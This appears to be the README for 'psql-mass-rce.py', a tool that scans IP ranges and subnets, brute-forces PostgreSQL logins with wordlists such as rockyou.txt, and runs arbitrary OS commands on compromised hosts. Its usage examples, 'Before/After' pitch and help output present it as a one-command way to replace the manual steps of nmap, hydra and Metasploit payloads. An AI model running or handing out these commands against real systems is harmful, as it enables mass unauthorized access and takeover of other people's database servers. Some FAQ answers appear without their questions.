Few examples to give you an idea:
| Example | Comment |
|---|---|
./psql-mass-rce.py 10.1.1.10 192.168.0.100-150 --port 5433 |
Accepts any number of any targets |
./psql-mass-rce.py 10.1.1.1/30 ./psql.gnmap --passfile rockyou.txt |
Accepts IP subnets and .gnmap files |
./psql-mass-rce.py -iL ./targets.txt --userfile users.txt |
Load IP[:port] from local file (nmap-alike) |
Scripts does the following:
- Checks if port is open
- Bruteforces credentials (using built-in dictionary or user files)
- Determines PostgreSQL version and OS
- Executes RCE if database user has enough rights
Live hosts with good credentials are saved to session file. After reconnaissance you may want to run RCE on those:
./psql-mass-rce.py --saved --command 'whoami'
pip3 install -r requirements.txt
PostgreSQL verions 9 and 10 (version 8 is in development).
Not yet. Technique was published almost 3 years ago.
Definately yes.
| Before | After |
|---|---|
| 1. run nmap for port scanning 2. run patator/hydra to bruteforce credentials 3. run psql binary to connect and check version 4. copy-paste payloads, or launch MSF postgres_payload manually at each host. |
./psql-mass-rce.py 10.1.1.0/24 |
psql-mass-rce v0.1
Usage: psql-mass-rce.py targets [-iL TARGETS_FILE] [--userfile USERFILE]
[--passfile PASSFILE] [--command COMMAND] [--port PORT]
[--saved]
Necessary arguments:
targets Accepts any number of these: IP, subnet, or .gnmap file
Optional arguments:
-h, --help show this help message and exit
-iL TARGETS_FILE Load IP[:port] targets from local file
--userfile USERFILE File with a list of users
--passfile PASSFILE File with a list of passwords
--command COMMAND Command to execute on a target machine
--port PORT Port to connect
--saved Work on targets from saved session file